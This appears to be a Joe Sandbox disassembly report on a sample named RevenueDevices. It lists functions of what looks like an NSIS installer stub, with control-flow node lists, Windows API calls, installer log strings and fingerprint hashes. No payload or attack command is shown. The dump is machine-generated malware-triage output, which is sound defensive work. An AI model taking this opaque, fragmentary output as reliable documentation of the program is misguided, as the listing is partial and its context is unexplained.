                                          control_flow_graph 820 4074bb-4074c0 821 4074c2-4074ef 820->821 822 40752f-407547 820->822 824 4074f1-4074f4 821->824 825 4074f6-4074fa 821->825 823 407aeb-407aff 822->823 829 407b01-407b17 823->829 830 407b19-407b2c 823->830 826 407506-407509 824->826 827 407502 825->827 828 4074fc-407500 825->828 831 407527-40752a 826->831 832 40750b-407514 826->832 827->826 828->826 833 407b33-407b3a 829->833 830->833 836 4076f6-407713 831->836 837 407516 832->837 838 407519-407525 832->838 834 407b61-407c68 833->834 835 407b3c-407b40 833->835 851 407350 834->851 852 407cec 834->852 840 407b46-407b5e 835->840 841 407ccd-407cd4 835->841 843 407715-407729 836->843 844 40772b-40773e 836->844 837->838 839 407589-4075b6 838->839 847 4075d2-4075ec 839->847 848 4075b8-4075d0 839->848 840->834 845 407cdd-407cea 841->845 849 407741-40774b 843->849 844->849 850 407cef-407cf6 845->850 853 4075f0-4075fa 847->853 848->853 854 40774d 849->854 855 4076ee-4076f4 849->855 856 407357-40735b 851->856 857 40749b-4074b6 851->857 858 40746d-407471 851->858 859 4073ff-407403 851->859 852->850 862 407600 853->862 863 407571-407577 853->863 864 407845-4078a1 854->864 865 4076c9-4076cd 854->865 855->836 861 407692-40769c 855->861 856->845 866 407361-40736e 856->866 857->823 871 407c76-407c7d 858->871 872 407477-40748b 858->872 877 407409-407420 859->877 878 407c6d-407c74 859->878 867 4076a2-4076c4 861->867 868 407c9a-407ca1 861->868 880 407556-40756e 862->880 881 407c7f-407c86 862->881 869 40762a-407630 863->869 870 40757d-407583 863->870 864->823 873 407c91-407c98 865->873 874 4076d3-4076eb 865->874 866->852 882 407374-4073ba 866->882 867->864 868->845 883 40768e 869->883 884 407632-40764f 869->884 870->839 870->883 871->845 879 40748e-407496 872->879 873->845 874->855 885 407423-407427 877->885 878->845 879->858 889 407498 879->889 880->863 881->845 887 4073e2-4073e4 882->887 888 4073bc-4073c0 882->888 883->861 890 407651-407665 884->890 891 407667-40767a 884->891 885->859 886 407429-40742f 885->886 893 407431-407438 886->893 894 407459-40746b 886->894 897 4073f5-4073fd 887->897 898 4073e6-4073f3 887->898 895 4073c2-4073c5 GlobalFree 888->895 896 4073cb-4073d9 GlobalAlloc 888->896 889->857 892 40767d-407687 890->892 891->892 892->869 899 407689 892->899 900 407443-407453 GlobalAlloc 893->900 901 40743a-40743d GlobalFree 893->901 894->879 895->896 896->852 902 4073df 896->902 897->885 898->897 898->898 904 407c88-407c8f 899->904 905 40760f-407627 899->905 900->852 900->894 901->900 902->887 904->845 905->869
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                          • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                          • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                          • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                          Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                          • FindClose.KERNEL32(00000000), ref: 004062EC
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID:
                                          • API String ID: 2295610775-0
                                          • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                          • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                          • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                          • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8
                                          Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295windowclipboardmemoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                          APIs
                                          • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                          • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                          • GetClientRect.USER32(?,?), ref: 00405196
                                          • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                          • ShowWindow.USER32(?,00000008), ref: 0040523A
                                          • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                          • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                            • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                          • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                          • ShowWindow.USER32(00000000), ref: 004052E7
                                          • ShowWindow.USER32(?,00000008), ref: 004052EC
                                          • ShowWindow.USER32(00000008), ref: 00405333
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                          • CreatePopupMenu.USER32 ref: 00405376
                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                          • GetWindowRect.USER32(?,?), ref: 0040539E
                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                          • OpenClipboard.USER32(00000000), ref: 0040540B
                                          • EmptyClipboard.USER32 ref: 00405411
                                          • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                          • GlobalLock.KERNEL32(00000000), ref: 00405427
                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                          • CloseClipboard.USER32 ref: 0040546E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                          • String ID: @rD$New install of "%s" to "%s"${
                                          • API String ID: 2110491804-2409696222
                                          • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                          • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                          • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                          • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59
                                          Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405626 GetDlgItem * 2 call 403d3f SetClassLongW call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 61->60 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 DestroyWindow KiUserCallbackDispatcher 80->90 82->73 87 405905-40590b 82->87 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                          APIs
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                          • ShowWindow.USER32(?), ref: 004054D2
                                          • DestroyWindow.USER32 ref: 004054E6
                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                          • GetDlgItem.USER32(?,?), ref: 00405523
                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                          • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                          • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                          • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                          • GetDlgItem.USER32(?,00000003), ref: 00405708
                                          • ShowWindow.USER32(00000000,?), ref: 0040572A
                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                          • EnableWindow.USER32(?,?), ref: 00405757
                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                          • EnableMenuItem.USER32(00000000), ref: 00405774
                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                          • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                          • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                          • ShowWindow.USER32(?,0000000A), ref: 00405910
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                          • String ID: @rD
                                          • API String ID: 3282139019-3814967855
                                          • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                          • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                          • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                          • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E
                                          Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-401870 call 404f72 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 281 401875-40188b call 406009 SetCurrentDirectoryW 268->281 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 281->160 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 292->291 298->288
                                          APIs
                                          • PostQuitMessage.USER32(00000000), ref: 00401648
                                          • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                          • SetForegroundWindow.USER32(?), ref: 004016CB
                                          • ShowWindow.USER32(?), ref: 00401753
                                          • ShowWindow.USER32(?), ref: 00401767
                                          • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                          • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                          • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                          • SetCurrentDirectoryW.KERNEL32(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                          • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                          • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                          • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                          • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                          Strings
                                          • Rename on reboot: %s, xrefs: 00401943
                                          • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                          • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                          • CreateDirectory: "%s" created, xrefs: 00401849
                                          • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                          • BringToFront, xrefs: 004016BD
                                          • Rename failed: %s, xrefs: 0040194B
                                          • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                          • Call: %d, xrefs: 0040165A
                                          • detailprint: %s, xrefs: 00401679
                                          • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                          • Aborting: "%s", xrefs: 0040161D
                                          • Rename: %s, xrefs: 004018F8
                                          • SetFileAttributes failed., xrefs: 004017A1
                                          • Sleep(%d), xrefs: 0040169D
                                          • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                          • Jump: %d, xrefs: 00401602
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                          • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                          • API String ID: 2872004960-3619442763
                                          • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                          • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                          • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                          • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE
                                          Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                          APIs
                                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                          • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                          • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                          • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                          • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                          • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                          • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                            • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                          • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                          • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
